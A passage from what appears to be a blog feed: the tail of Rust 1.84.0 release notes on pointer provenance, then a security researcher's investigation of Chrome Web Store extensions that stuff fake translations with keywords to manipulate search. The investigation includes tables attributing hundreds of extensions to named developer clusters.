Most of the time, programmers do not need to worry much about provenance, and it is very clear how a pointer got derived. However, when casting pointers to integers and back, the provenance of the resulting pointer is underspecified. With this release, Rust is adding a set of APIs that can in many cases replace the use of integer-pointer-casts, and therefore avoid the ambiguities inherent to such casts. In particular, the pattern of using the lowest bits of an aligned pointer to store extra information can now be implemented without ever casting a pointer to an integer or back. This makes the code easier to reason about, easier to analyze for the compiler, and also benefits tools like Miri and architectures like CHERI that aim to detect and diagnose pointer misuse.

For more details, see the standard library documentation on provenance.

Stabilized APIs

These APIs are now stable in const contexts

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.84.0

Many people came together to create Rust 1.84.0. We couldn't have done it without all of you. Thanks!

Wladimir PalantHow extensions trick CWS search

A few months ago I searched for “Norton Password Manager” in Chrome Web Store and got lots of seemingly unrelated results. Not just that, the actual Norton Password Manager was listed last. These search results are still essentially the same today, only that Norton Password Manager moved to the top of the list:

Screenshot of Chrome Web Store search results listing six extensions. While Norton Password Manager is at the top, the remaining search results like “Vytal - Spoof Timezone, Geolocation & Locale”, “Free VPN - 1VPN” or “Charm - Coupons, Promo Codes, & Discounts” appear completely unrelated. All extensions are marked as featured.

I was stumped how Google managed to mess up search results so badly and even posted the following on Mastodon:

Interesting. When I search for “Norton Password Manager” on Chrome Web Store, it first lists five completely unrelated extensions, and only the last search result is the actual Norton Password Manager. Somebody told me that website is run by a company specializing in search, so this shouldn’t be due to incompetence, right? What is it then?

Somebody suggested that the extensions somehow managed to pay Google for this placement which seems… well, rather unlikely. For reasons, I came back to this a few weeks ago and decided to take a closer look at the extensions displayed there. These seemed shady, with at least three results being former open source extensions (as in: still claiming to be open source but the code repository linked didn’t contain the current state).

And then I somehow happened to see what it looks like when I change Chrome Web Store language:

Screenshot of Chrome Web Store search results listing the same six extensions. The change in language is visible because the “Featured” badge is now called something else. All extension descriptions are still English however, but they are different. 1VPN calls itself “Browsec vpn urban vpn touch tunnelbear vpn 1click vpn 1clickvpn - 1VPN” and Vytal calls itself “Vytal - Works With 1click VPN & Hotspot VPN”.

Now I don’t claim to know Swahili but what happened here clearly wasn’t translating.

The trick

Google Chrome is currently available in 55 languages. Browser extensions can choose to support any subset of these languages, even though most of them support exactly one. Not only the extension’s user interface can be translated, its name and short description can be made available in multiple languages as well. Chrome Web Store considers such translations according to the user’s selected language. Chrome Web Store also has an extensive description field which isn’t contained within the extension but can be translated.

Apparently, some extension authors figured out that the Chrome Web Store search index is shared across all languages. If you wanted to show up in the search when people look for your competitors for example, you could add their names to your extension’s description – but that might come across as spammy. So what you do instead is sacrificing some of the “less popular” languages and stuff the descriptions there full of relevant keywords. And then your extension starts showing up for these keywords even when they are entered in the English version of the Chrome Web Store. After all, who cares about Swahili other than maybe five million native speakers?

I’ve been maintaining a Github repository with Chrome extension manifests for a while, uploading new snapshots every now and then. Unfortunately, it only contained English names and descriptions. So now I’ve added a directory with localized descriptions for each extension. With that data, most of the issues became immediately obvious – even if you don’t know Swahili.

Screenshot of a JSON listing. The key name is sw indicating Swahili language. The corresponding description starts with “Charm is a lightweight, privacy friendly coupon finder.” Later on it contains a sequence of newlines, followed by a wall of text along the lines of: “GMass: Powerful mail merge for GMail Wikiwand - Wikipedia, and beyond Super dark mode Desktopify”

Update (2025-01-09): Apparently, Google has already been made aware of this issue a year ago at the latest. Your guess is as good as mine as to why it hasn’t been addressed yet.

Who is doing it?

Sifting through the suspicious descriptions and weeding out false positives brought up 920 extensions with bogus “translations” so far, and I definitely didn’t get all of them (see the extension lists). But that doesn’t actually mean hundreds of extension developers. I’ve quickly noticed patterns, somebody applying roughly the same strategy to a large cluster of extensions. For example, European developers tended to “sacrifice” some Asian languages like Bengali whereas developers originating in Asia preferred European languages like Estonian. These strategies were distinctly different from each other and there wasn’t a whole lot of them, so there seems to be a relative low number of parties involved. Some I could even put a name on.

Kodice LLC / Karbon Project LP / BroCode LTD

One such cluster of extensions has been featured on this blog in 2023 already. Back then I listed 108 of their extensions which was only a small sample of their operations. Out of that original sample, 96 extension remain active in Chrome Web Store. And out of these, 81 extensions are abusing translations to improve their ranking in the extension search. From the look of it, all their developers are speaking Russian now – I guess they are no longer hiring in Ukraine. I’ve expanded on the original list a bit, but attribution is unfortunately too time consuming here. So it’s likely way more than the 122 extensions I now list for this cluster.

Back in 2023 some of these extensions were confirmed to spy on users, commit affiliate fraud or inject ads into web pages. The others seemed benign which most likely meant that they were accumulating users and would turn malicious later. But please don’t mention Kodice LLC, Karbon Project LP, BroCode LTD in the context of malicious extensions and Chrome Web Store spam, they don’t like that. In fact, they sent a bogus DMCA takedown notice in an attempt to remove my article from the search engines, claiming that it violates the copyright of the …checks notes… Hacker News page discussing that very article. So please don’t say that Kodice LLC, Karbon Project LP, BroCode LTD are spamming Chrome Web Store with their extensions which would inevitably turn on their users – they are definitely the good guys … sorry, good bros I mean.

PDF Toolbox cluster

Another extension cluster also appeared on this blog before. Back in 2023 an investigation that started with the PDF Toolbox extension brought up 34 malicious extensions. The extensions contained obfuscated code that was hijacking people’s searches and monetizing them by redirecting to Bing. Not that they were limited to it, they could potentially do way more damage.

Note: The PDF Toolbox extension is long gone from Chrome Web Store and unrelated to the extension with the same name available there now.

Google removed all the extensions I reported back then, but whoever is behind them kept busy of course. I found 107 extensions belonging to the same cluster, out of these 100 extensions are on my list due to abusing translations to improve their ranking. I didn’t have the time to do an in-depth analysis of these extensions, but at least one (not on the list) is again doing search hijacking and not even hiding it. The few others I briefly looked at didn’t have any obvious malicious functionality – yet.

Unfortunately, I haven’t come across many clues towards who is behind these extensions. There is a slight indication that these extensions might be related to the BroCode cluster, but that’s far from certain given the significant differences between the two. One thing is certain however: you shouldn’t believe their user numbers, these have clearly been inflated artificially.

ZingFront Software / ZingDeck / BigMData

There is one more huge extensions cluster that I investigated in 2023. Back then I gave up without publishing my findings, in part due to Google’s apparent lack of interest in fighting spam in their add-on store. Lots of websites, lots of fake personas and supposed companies that don’t actually exist, occasionally even business addresses that don’t exist in the real world. There are names like LinkedRadar, FindNiche or SellerCenter, and they aren’t spamming only Chrome Web Store but also mobile app stores and search engines for example. This is clearly a big operation, but initially all I could really tell was that this was the work of people speaking Chinese. Was this a bunch of AI enthusiasts looking to make a quick buck and exchanging ideas?

In the hindsight it took me too long to realize that many of the websites run on ZingFront infrastructure and ZingFront employees are apparently involved. Then things started falling into place, with the clues being so obvious: I found BigMData International PTE. LTD. linked to some of the extensions, ZingDeck Intl LTD. responsible for some of the others. Both companies are located at the same address in Singapore and obviously related. And both appear to be subsidiaries of ZingFront Software, an AI startup in Beijing. ZingDeck claims to have 120 employees, which is quite sufficient to flood Chrome Web Store with hundreds of extensions. Being funded by Baidu Ventures certainly helps as well.

Altogether I could attribute 223 extensions on my list to this cluster. For this article I could not really inspect the functionality of these extensions, but it seems that they are being monetized by selling subscriptions to premium functionality. Same seems to be true for the numerous other offers pushed out by these companies.

I asked ZingFront Software for a comment but haven’t heard back from them so far.

ExtensionsBox, Lazytech, Yue Apps, Chrome Extension Hub, Infwiz, NioMaker

The extension clusters ExtensionsBox, Lazytech, Yue Apps, Chrome Extension Hub, Infwiz and NioMaker produce very similar extensions and all seem to be run by Chinese-speaking developers. Some of those might actually be one cluster, or they might all be subdivisions of ZingDeck. Quite frankly, I didn’t want to waste even more time figuring out who is working together and who is competing, so I listed them all separately.

Free Business Apps

This is a large cluster which I haven’t noticed before. It has hundreds of extensions connected to websites like Free Business Apps, PDFWork, DLLPlayer and many more. It contributed “merely” 55 extensions to my list however because the developers of these extensions generally prefer to avoid awkward situations due to mismatched translations. So instead they force the desired (English) keywords into all translations of the extension’s description. This approach is likely aiming for messing up general search engines and not merely Chrome Web Store search. As it is out of scope for this article, only the relatively rare exceptions made my list here.

It isn’t clear who is behind this cluster of extensions. On the one edge of this cluster I found the Ukraine-based Blife LLC, yet their official extensions aren’t linked to the cluster. I asked the company for comment and got a confirmation of what I’ve already suspected after looking at a bunch of court decisions: a previous developer and co-owner left the company, taking some of the assets with him. He now seems to be involved with at least some of the people running this cluster of extensions.

The other edge of the cluster doesn’t seem to be speaking Russian or Ukrainian however, there are instead weak indications that Farsi-speakers are involved. Here I found the Teheran-based Xino Digital, developing some extensions with weak connections to this cluster. While Xino Digital specializes in “Digital Marketing” and “SEO & Organic Traffic,” they seem to lack the resources for this kind of operation. I asked Xino Digital for a comment but haven’t heard back so far.

The approaches

While all extensions listed use translations to mess with Chrome Web Store search, a number of different approaches can be distinguished. Most extensions combine a few of the approaches listed below. Some extension clusters use the same approaches consistently, others vary theirs. I’ve linked to the applying approaches from the extension list.

1. Different extension name

This approach is very popular, likely due to Chrome Web Store search weighting extension name more than its descriptions. So many extensions will use slight variations of their original name depending on the language. Some extensions even go as far as using completely different names, occasionally entirely unrelated to the extension’s purpose – all to show up prominently in searches.

2. Different short description

Similarly, some extensions contain different variants of their short description for various languages. The short description typically doesn’t change much and is only used to show up for a bunch of related search keywords. A few extensions replaced their short description for some languages with a list of keywords however.

3. Using competitors’ names

In some cases I noticed extensions using names of their competitors or other related products. Some would go as far as “rename” themselves into a competing product in some languages. In other cases this approach is made less obvious, e.g. when extension descriptions provide lists of “alternatives” or “compatible extensions.” I haven’t flagged this approach consistently, simply because I don’t always know who the competitors are.

4. Considerably more extensive extension description

Some extensions have a relatively short and concise English description, yet the “translation” into some other languages is a massive wall of text, often making little sense. Sometimes a translation is present, but it is “extended” with a lengthy English passage. In other scenarios only English text is present. This text only seems to exist to place a bunch of keywords.

Note that translation management in Chrome Web Store is quite messy, so multiple variants of the English translation aren’t necessarily a red flag – these might have simply been forgotten. Consequently, I tried to err in favor of extension authors when flagging this approach.

5. Keywords at the end of extension description

A very popular approach is taking a translation (or an untranslated English description), then adding a long list of keywords and keyphrases to the end of it in some languages. Often this block is visually separated by a bunch of empty lines, making sure people actually reading the description in this language aren’t too confused.

6. Keywords within the extension description

A more stealthy approach is hiding the keywords within the extension description. Some extensions will use slight variations of the same text, only differing in one or two keywords. Others use automated translations of their descriptions but place a bunch of (typically English) keywords in these translations. Occasionally there is a translation which is broken up by a long list of unrelated keywords.

7. Different extension description

In a few cases the extension description just looked like a completely unrelated text. Sometimes it seemed to be a copy of a description from a competing extension, other times it made no sense whatsoever.

And what should Google do about it?

Looking at Chrome Web Store policy on spam and abuse, the formulation is quite clear:

Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store.

So Google can and should push back on this kind of manipulation. At the very least, Google might dislike the fact that there are currently at least eleven extensions named “Google Translate” – at least in some languages. In fact, per the same policy Google isn’t even supposed to tolerate spam in Chrome Web Store:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.

Unfortunately, Google hasn’t been very keen on enforcing this policy in the past.

There is also a possible technical solution here. By making Chrome Web Store search index per-language, Google could remove the incentives for this kind of manipulation. If search results for Bengali no longer show up in English-language searches, there is no point messing up the Bengali translation any more. Of course, searching across languages is a feature – yet this feature isn’t worth it if Google cannot contain the abuse by other means.

Quite frankly, I feel that Google should go beyond basic containment however. The BroCode and PDF Toolbox clusters are known to produce malicious extensions. These need to be monitored proactively, and the same kind of attention might be worth extending to the other extension clusters as well.

The extensions in question

One thing up front: Chrome Web Store is messy. There are copycats, pretenders, scammers. So attribution isn’t always a straightforward affair, and there might occasionally be an extension attributed to one of the clusters which doesn’t belong there. It’s way more common that an extension isn’t sorted into its cluster however, simply because the evidence linking it to the cluster isn’t strong enough, and I only had limited time to investigate.

The user counts listed reflect the state on December 13, 2024.

Kodice / Karbon Project / BroCode

Name Weekly active users Extension ID Approaches
What Font - find font & color 125 abefllafeffhoiadldggcalfgbofohfa 1, 2, 4
Video downloader web 1,000,000 acmbnbijebmjfmihfinfipebhcmgbghi 1, 2, 4
Picture in Picture - Floating player 700,000 adnielbhikcbmegcfampbclagcacboff 1, 2, 4
Floating Video Player Sound Booster 600,000 aeilijiaejfdnbagnpannhdoaljpkbhe 1, 2, 4
Sidebarr - ChatGPT, bookmarks, apps and more 100,000 afdfpkhbdpioonfeknablodaejkklbdn 1, 2, 5
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo 1, 2
Cute Cursors - Custom Cursor for Chrome™ 1,000,000 anflghppebdhjipndogapfagemgnlblh 4
Adblock for Youtube - skip ads 800,000 annjejmdobkjaneeafkbpipgohafpcom 1, 2, 3, 4
Translator, Dictionary - Accurate Translate 800,000 bebmphofpgkhclocdbgomhnjcpelbenh 1, 2, 3, 4
Screen Capture, Screenshot, Annotations 500,000 bmkgbgkneealfabgnjfeljaiegpginpl 1, 2
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi 1, 2
Sound Booster - Volume Control 3,000,000 ccjlpblmgkncnnimcmbanbnhbggdpkie 1, 2, 4, 6
Web Client for Instagram™ - Sidegram 200,000 cfegchignldpfnjpodhcklmgleaoanhi 1, 2
Paint Tool for Chrome 200,000 coabfkgengacobjpmdlmmihhhfnhbjdm 1, 2, 4
History & Cache Cleaner - Smart Clean 2,000 dhaamkgjpilakclbgpabiacmndmhhnop 1, 2
Screenshot & Screen Video Record by Screeny 2,000,000 djekgpcemgcnfkjldcclcpcjhemofcib 1, 2, 4
Video Downloader for U 3,000,000 dkbccihpiccbcheieabdbjikohfdfaje 4
Multi Chat - Messenger for WhatsApp 2,000,000 dllplfhjknghhdneiblmkolbjappecbe 1, 2, 3, 7
Night Shift Mode 200,000 dlpimjmonhbmamocpboifndnnakgknbf 1, 2, 4
Music Downloader - VKsaver 500,000 dmbjkidogjmmlejdmnecpmfapdmidfjg 1, 2, 4
Daily Tab - New tab with ChatGPT 1,000 dnbcklfggddbmmnkobgedggnacjoagde 1, 2, 4
Web Color Picker - online color grabber 1,000,000 dneifdhdmnmmlobjbimlkcnhkbidmlek 1, 3, 4
Paint - Drawings Easy 300,000 doiiaejbgndnnnomcdhefcbfnbbjfbib 1, 2, 4, 6
Block Site - Site Blocker & Focus Mode 2,000,000 dpfofggmkhdbfcciajfdphofclabnogo 1, 2, 3, 4
2048 Online Classic game 200,000 eabhkjojehdleajkbigffmpnaelncapp 1, 2
Gmail Notifier - gmail notification tool 100,000 ealojglnbikknifbgleaceopepceakfn 6
Volume Recorder Online 1,000,000 ebdbcfomjliacpblnioignhfhjeajpch 1, 2, 4, 6
Volume Booster - Sound & Bass boost 1,000,000 ebpckmjdefimgaenaebngljijofojncm 1, 2, 4, 6
Screenshot Tool - Screen Capture & Editor 1,000,000 edlifbnjlicfpckhgjhflgkeeibhhcii 1, 2, 4, 6
Tabrr Dashboard - New Tab with ChatGPT 300,000 ehmneimbopigfgchjglgngamiccjkijh 6
New Tab for Google Workspace™ 200,000 ehpgcagmhpndkmglombjndkdmggkgnge 1, 4, 5
Equalizer - Bass Booster Master 200,000 ejigejogobkbkmkgjpfiodlmgibfaoek 1, 2, 4, 6
Paint 300,000 ejllkedmklophclpgonojjkaliafeilj 1, 4
Online messengers in All-in-One chat 200,000 ekjogkoigkhbgdgpolejnjfmhdcgaoof 2, 4, 6
Ultimate Video Downloader 700,000 elpdbicokgbedckgblmbhoamophfbchi 2
Translate for Chrome -Translator, Dictionary 500,000 elpmkbbdldhoiggkjfpgibmjioncklbn 1, 2, 3
Color Picker, Eyedropper - Geco colorpick 2,000,000 eokjikchkppnkdipbiggnmlkahcdkikp 1, 2, 3, 4, 6
Dark Mode for Chrome 1,000,000 epbpdmalnhhoggbcckpffgacohbmpapb 1, 2, 4
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab 1, 2, 4
Flash Player Enabler 300,000 eplfglplnlljjpeiccbgnijecmkeimed 1, 2
ChitChat - Search with ChatGPT 2,000,000 fbbjijdngocdplimineplmdllhjkaece 1, 2, 3, 4
Simple Volume Booster 1,000,000 fbjhgeaafhlbjiejehpjdnghinlcceak 1, 2, 4, 6
Free VPN for Chrome - VPN Proxy 1click VPN 8,000,000 fcfhplploccackoneaefokcmbjfbkenj 1, 2
InSaverify - Web for Instagram™ 800,000 fobaamfiblkoobhjpiigemmdegbmpohd 1, 2, 4, 6
ChatGPT Assistant - GPT Search 900,000 gadbpecoinogdkljjbjffmiijpebooce 1, 2, 4, 6
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca 1, 2, 3, 4
Web Sound Equalizer 700,000 gceehiicnbpehbbdaloolaanlnddailm 1, 2, 4, 6
Screenshot Master: Full Page Capture 700,000 ggacghlcchiiejclfdajbpkbjfgjhfol 1, 2, 4
Dark Theme - Dark mode for Chrome 900,000 gjjbmfigjpgnehjioicaalopaikcnheo 1, 2, 4
Cute Tab - Custom Dashboard 60,000 gkdefhnhldnmfnajfkeldcaihahkhhnd 1
Quick Translate: Reading & writing translator 100,000 gpdfpljioapjogbnlpmganakfjcemifk 1, 2, 4
HD Video Downloader 800,000 hjlekdknhjogancdagnndeenmobeofgm 1, 2
Web Translate - Online translator 1,000,000 hnfabcchmopgohnhkcojhocneefbnffg 1, 2, 3, 4, 6
QR Code Generator 300,000 hoeiookpkijlnjdafhaclpdbfflelmci 1, 2, 4
2048 Game 1,000,000 iabflonngmpkalkpbjonemaamlgdghea 4
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj 4, 6
Multilanguage Translator 1,000,000 ielooaepfhfcnmihgnabkldnpddnnldl 1, 2, 3, 4, 6
FocusGuard - Block Site & Focus Mode 400,000 ifdepgnnjpnbkcgempionjablajancjc 1, 2, 3, 7
Scrnli - Screen Recorder & Screen Capture App 1,000,000 ijejnggjjphlenbhmjhhgcdpehhacaal 1, 2, 4
Web Paint Tool - draw online 600,000 iklgljbighkgbjoecoddejooldolenbj 1, 2, 4, 5
Screen Recorder and Screenshot Tool 1,000,000 imopknpgdihifjkjpmjaagcagkefddnb 1, 2, 4
Free VPN Chrome extension - Best VPN by uVPN 1,000,000 jaoafpkngncfpfggjefnekilbkcpjdgp 1, 2, 7
Video Downloader Social 1,000,000 jbmbplbpgcpooepakloahbjjcpfoegji 1, 2, 4
Color Picker Online - Eyedropper Tool 189 jbnefeeccnjmnceegehljhjonmlbkaji 1, 2
Volume Booster, equalizer → Audio control 1,000,000 jchmabokofdoabocpiicjljelmackhho 1, 4
PDF Viewer 1,000,000 jdlkkmamiaikhfampledjnhhkbeifokk 1, 2, 4
Adblock Web - Adblocker for Chrome 300,000 jhkhlgaomejplkanglolfpcmfknnomle 1, 2, 3
Adblock Unlimited - Adblocker 600,000 jiaopkfkampgnnkckajcbdgannoipcne 1, 2, 3, 4
Hide YouTube distraction - shorts block 1,000 jipbilmidhcobblmekbceanghkdinccc 1, 2, 3
ChatGPT for Chrome - GPT Search 700,000 jlbpahgopcmomkgegpbmopfodolajhbl 1, 2, 3
Adblock for YouTube™ 2,000,000 jpefmbpcbebpjpmelobfakahfdcgcmkl 1, 2, 3, 4
User Agent Switcher 100,000 kchfmpdcejfkipopnolndinkeoipnoia 1
Speed Test for Chrome - WiFi speedtest 400,000 khhnfdoljialnlomkdkphhdhngfppabl 1, 2, 4, 6
Video Downloader professional 400,000 knkpjhkhlfebmefnommmehegjgglnkdm 1, 2, 4
Quick Translate 700,000 kpcdbiholadphpbimkgckhggglklemib 1, 2, 4, 6
Tab Suspender 100,000 laameccjpleogmfhilmffpdbiibgbekf 1
Adblock for Youtube - ad blocker tool 800,000 lagdcjmbchphhndlbpfajelapcodekll 1, 2, 3, 4
PDF Viewer - open in PDF Reader 300,000 ldaohgblglnkmddflcccnfakholmaacl 1, 2, 4
Moment - #1 Personal Dashboard for Chrome 200,000 lgecddhfcfhlmllljooldkbbijdcnlpe 1
Screen Video Recorder & Screenshot 400,000 lhannfkhjdhmibllojbbdjdbpegidojj 1, 2
Dark Theme - Dark Reader for Web 1,000,000 ljjmnbjaapnggdiibfleeiaookhcodnl 1, 2, 4, 6
Auto Refresh Page - reload page 500,000 lkhdihmnnmnmpibnadlgjfmalbaoenem 1, 2, 4, 6
Flash Player for Web 800,000 lkhhagecaghfakddbncibijbjmgfhfdm 1, 2, 4, 6
INSSAVE - App for Instagram 100,000 lknpbgnookklokdjomiildnlalffjmma 1, 2, 4, 6
Simple Translator, Dictionary, TTS 1,000,000 lojpdfjjionbhgplcangflkalmiadhfi 1, 2, 3, 4, 6
Web paint tool - Drawww 60,000 mclgkicemmkpcooobfgcgocmcejnmgij 6
Adblock for Twitch 200,000 mdomkpjejpboocpojfikalapgholajdc 1, 2, 3, 4
Infinite Dashboard - New Tab like no other 200,000 meffljleomgifbbcffejnmhjagncfpbd 1, 2, 4
ChatGPT Assistant for Chrome - SidebarGPT 1,000,000 mejjgaogggabifjfjdbnobinfibaamla 1, 2
Volume Max - Ultimate Sound Booster 1,000,000 mgbhdehiapbjamfgekfpebmhmnmcmemg 1, 2, 4
Good Video Downloader 400,000 mhpcabliilgadobjpkameggapnpeppdg 4
Video Downloader Unlimited 1,000,000 mkjjckchdfhjbpckippbnipkdnlidbeb 1, 2, 4
ChatGPT for Google: Search GPT 500,000 mlkjjjmhjijlmafgjlpkiobpdocdbncj 1, 2, 4, 6
Translate - Translator, Dictionary, TTS 1,000,000 mnlohknjofogcljbcknkakphddjpijak 1, 2, 3, 4, 5
Web Paint - Page Marker & Editor 400,000 mnopmeepcnldaopgndiielmfoblaennk 1, 2, 4, 6
Auto Refresh & Page Monitor 1,000,000 nagebjgefhenmjbjhjmdifchbnbmjgpa 1, 2, 4
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc 1, 2, 4
SearchGPT - ChatGPT for Chrome 2,000,000 ninecedhhpccjifamhafbdelibdjibgd 1, 2
Video Speed Controller for HTML videos 400,000 nkkhljadiejecbgelalchmjncoilpnlk 1, 2, 4, 6
Flash Player that Works! 300,000 nlfaobjnjbmbdnoeiijojjmeihbheegn 1, 2, 4, 6
Sound Booster - increase volume up 1,000,000 nmigaijibiabddkkmjhlehchpmgbokfj 1, 2, 4, 6
Voice Reader: Read Aloud Text to Speech (TTS) 500,000 npdkkcjlmhcnnaoobfdjndibfkkhhdfn 1, 2, 4, 5
uTab - Unlimited Custom Dashboard 200,000 npmjjkphdlmbeidbdbfefgedondknlaf 1, 4, 6
Flash Player for Chrome 600,000 oakbcaafbicdddpdlhbchhpblmhefngh 1, 2
Paint Tool by Painty 400,000 obdhcplpbliifflekgclobogbdliddjd 1, 2
Night Shift 200,000 ocginjipilabheemhfbedijlhajbcabh 1, 2
Editor for Docs, Sheets & Slides 200,000 oepjogknopbbibcjcojmedaepolkghpb 1, 2, 6
Accept all cookies 300,000 ofpnikijgfhlmmjlpkfaifhhdonchhoi 1, 2, 3, 4
The Cleaner - delete Cookies and Cache 100,000 ogfjgagnmkiigilnoiabkbbajinanlbn 1, 2
Screenshot & Screen Recorder 1,000,000 okkffdhbfplmbjblhgapnchjinanmnij 1, 2, 4
Cute ColorBook - Coloring Book Online 9,000 onhcjmpaffbelbeeaajhplmhfmablenk 1
What Font - font finder 400,000 opogloaldjiplhogobhmghlgnlciebin 1, 2, 4
Translator - Select to Translate 1,000,000 pfoflbejajgbpkmllhogfpnekjiempip 1, 2, 3, 4, 6
Custom Cursors for Chrome 800,000 phfkifnjcmdcmljnnablahicoabkokbg 1, 2, 4
Color Picker - Eyedropper Tool 100,000 phillbeieoddghchonmfebjhclflpoaj 1, 2, 4, 6
Text mode for websites - ReadBee 500,000 phjbepamfhjgjdgmbhmfflhnlohldchb 1, 2, 4, 6
Dark Mode - Dark Reader for Сhrome 8,000,000 pjbgfifennfhnbkhoidkdchbflppjncb 1, 2, 4, 6
Sound Booster - Boost My Bass 900,000 plmlopfeeobajiecodiggabcihohcnge 1, 2, 4
Sound Booster 100,000 pmilcmjbofinpnbnpanpdadijibcgifc 1, 2, 4
Screen Capture - Screenshot Tool 700,000 pmnphobdokkajkpbkajlaiooipfcpgio 1, 4
Floating Video with Playback Controls 800,000 pnanegnllonoiklmmlegcaajoicfifcm 1, 2
Cleaner - history & cache clean 100,000 pooaemmkohlphkekccfajnbcokjlbehk 1, 2, 4, 6

PDF Toolbox cluster

Name Weekly active users Extension ID Approaches
Stick Ninja Game 3,000,000 aamepfadihoeifgmkoipamkenlfpjgcm 4
Emoboard Emoji Keyboard 3,000,000 aapdabiebopmbpidefegdaefepkinidd 1, 2, 4
Flappy Bird Original 4,000,000 aejdicmbgglbjfepfbiofnmibcgkkjej 1, 2, 4
Superb Copy 4,000,000 agdjnnfibbfdffpdljlilaldngfheapb 1, 2, 4
Super Volume Booster 1,000,000 ahddimnokcichfhgpibgbgofheobffkb 4
Enlargify 2,000,000 aielbbnajdbopdbnecilekkchkgocifh 1, 2, 4
ImgGet 3,000,000 anblaegeegjbfiehjadgmonejlbcloob 1, 2, 4
Blaze VPN for Chrome 8,000,000 anenfchlanlnhmjibebhkgbnelojooic 1, 2, 4
Web Paint Smart 1,000,000 baaibngpibdagiocgahmnpkegfnldklp 1, 2, 4
Click Color Picker 4,000,000 bfenhnialnnileognddgkbdgpknpfich 1, 2, 4
Dino 3D 3,000,000 biggdlcjhcjibifefpchffmfpmclmfmk 1, 2, 4
Soundup Sound Booster 6,000,000 bjpebnkmbcningccjakffilbmaojljlb 1, 2, 7
Yshot 3,000,000 bkgepfjmcfhiikfmamakfhdhogohgpac 1, 2, 4, 7
VidRate 4,000,000 bmdjpblldhdnmknfkjkdibljeblmcfoi 1, 2, 4
Ultra Volume Booster 3,000,000 bocmpjikpfmhfcjjpkhfdkclpfmceccg 1, 2, 4
Supreme Copy 6,000,000 cbfimnpbnbgjbpcnaablibnekhfghbac 1, 2, 4
Lumina Night Mode 400,000 ccemhgcpobolddhpebenclgpohlkegdg 1, 2, 4
Amazing Screen Recorder 6,000,000 cdepgbjlkoocpnifahdfjdhlfiamnapm 1, 2, 4
BPuzzle 10,000 cgjlgmcfhoicddhjikmjglhgibchboea 1, 2, 4
Super Video Speed Controller 6,000,000 chnccghejnflbccphgkncbmllhfljdfa 1, 2, 4
Lensify 1,000,000 ckdcieaenmejickienoanmjbhcfphmio 1, 2, 4
FontSpotter 2,000,000 cncllbaocdclnknlaciemnogblnljeej 1, 2, 4, 6
ImageNest 2,000,000 dajkomgkhpnmdilokgoekdfnfknjgckh 1, 2, 4
Swift Auto Refresh 4,000,000 dbplihfpjfngpdogehdcocadhockmamf 1, 2, 4
StopSurf 2,000,000 dcjbilopnjnajannajlojjcljaclgdpd 1, 2, 4
PDF SmartBox 10,000,000 dgbbafiiohandadmjfcffjpnlmdlaalh 1, 2, 4
Dungeon Dodge 3,000,000 dkdeafhmbobcccfnkofedleddfbinjgp 1, 2, 4
Scope Master 2,000,000 dlbfbjkldnioadbilgbfilbhafplbnan 1, 2, 4
RazorWave 3,000,000 ecinoiamecfiknjeahgdknofjmpoemmi 1, 2, 4
TurboPlay 4,000,000 ehhbjkehfcjlehkfpffogeijpinlgjik 1, 2, 4
Emoji keyboard live 3,000,000 elhapkijbdpkjpjbomipbfofipeofedj 1, 2, 4
Flashback Flash Player 3,000,000 emghchaodgedjemnkicegacekihblemd 1, 2, 4
RampShield Adblock 2,000,000 engbpelfmhnfbmpobdooifgnfcmlfblf 1, 2, 3, 4
BackNav 2,000,000 epalebfbjkaahdmoaifelbgfpideadle 1, 2, 4
Spark blocker 5,000,000 gfplodojgophcijhbkcfmaiafklijpnf 1, 2, 7
EmuFlash 1,000,000 ghomhhneebnpahhjegclgogmbmhaddpi 1, 2, 4
Minesweeper Original 4,000,000 gjdmanggfaalgnpinolamlefhcjimmam 1, 2, 4
PixGrid Ruler 1,000,000 glkplndamjplebapgopdlbicglmfimic 1, 2, 4
Flexi PDF Reader 1,000,000 gmpignfmmkcpnildloceikjmlnjdjgdg 1, 2, 4
Dino Rush 2,000,000 hbkkncjljigpfhghnjhjaaimceakjdoo 1, 2, 4
Amazing color picker 4,000,000 hclbckmnpbnkcpemopdngipibdagmjei 1, 2, 4
ChatGPT Assistant Plus 6,000,000 hhclmnigoigikdgiflfihpkglefbaaoa 1, 2, 4
Bspace 3,000,000 hhgokdlbkelmpeimeijobggjmipechcp 1, 2, 4
Bomberman Classic Game 4,000,000 hlcfpgkgbdgjhnfdgaechkfiddkgnlkg 4
Inline Lingo 4,000,000 hmioicehiobjekahjabipaeidfdcnhii 1, 2, 4
Superpowers for Chatgpt 4,000,000 ibeabbjcphoflmlccjgpebbamkbglpip 1, 2, 4
Spark Auto Refresh 4,000,000 ifodiakohghkaegdhahdbcdfejcghlob 1, 2, 4
Video Speed Pro 6,000,000 iinblfpbdoplpbdkepibimlgabgkaika 1, 2, 4
Elysian EPUB Reader 10,000 ijlajdhnhokgdpdlbiomkekneoejnhad 1, 4
Smart Color Picker 1,000,000 ilifjbbjhbgkhgabebllmlcldfdgopfl 1, 2, 4
Ad Skip Master for Youtube 6,000,000 imlalpfjijneacdcjgjmphcpmlhkhkho 1, 2, 4, 7
Shopify spy scraper & parser 300,000 injdgfhiepghpnihhgmkejcjnoohaibm 1, 2, 4
Gloom Dark Mode 4,000,000 ioleaeachefbknoefhkbhijdhakaepcb 1, 2, 4
SnapTrans 3,000,000 jfcnoffhkhikehdbdioahmlhdnknikhl 1, 2, 4
DownloadAs PNG JPG 2,000,000 jjekghbhljeigipmihbdeeonafimpole 1, 2, 4
Umbra Dark Mode 3,000,000 jjlelpahdhfgabeecnfppnmlllcmejkg 1, 2, 4
Power Tools for ChatGPT 11,000,000 jkfkhkobbahllilejfidknldjhgelcog 1, 2, 4, 6
Image Formatter 7,000 kapklhhpcnelfhlendhjfhddcddfabap 1, 2, 4
Safum free VPN 6,000,000 kbdlpfmnciffgllhfijijnakeipkngbe 1, 2, 3, 4
